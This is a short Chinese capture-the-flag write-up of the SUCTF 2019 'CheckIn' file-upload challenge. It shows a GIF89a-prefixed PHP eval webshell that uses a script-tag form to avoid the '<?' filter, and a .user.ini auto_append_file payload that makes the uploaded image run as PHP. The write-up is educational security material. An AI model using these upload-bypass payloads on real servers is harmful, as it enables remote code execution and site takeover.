标签:SUCTF 文件 CheckIn flag 2019 ini 解析 上传 user
打开环境
发现好像是个文件上传漏洞发现可以传jgp格式的图
但是传被过滤的的就会出现
这里就要了解一个函数
exif_imagetype
函数简介
其实就是一个类型的比较
所以这里和其他文件上传设置的黑白名单没两样
可以直接魔术头绕过就行
然后进过测试发现文件名带ph的被过滤了所以用phtm后缀l解析不行了
文件内容有<?的被过滤了
所以这里这样绕过
2.jpg
GIF89a
<script language="php"> eval($_POST[1]);</script>
上传成功了 但是没有被解析 然后这块的又没有文件包含漏洞,所以不容易被解析 所以不能用工具链接
这里就要了解另一个知识点了
神秘的.user.ini文件
先配置.user.ini再上传在它目录下进行解析
.user.ini
GIF89a
auto_append_file=1.jpg
然后再上传木马
工具链接在根目录寻找flag
也能在木马语句中直接抓flag
这样直接访问文件位置得到flag
希望这篇文章能帮到你!
标签:SUCTF,文件,CheckIn,flag,2019,ini,解析,上传,user 来源: https://blog.csdn.net/qq_53460654/article/details/116274805
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。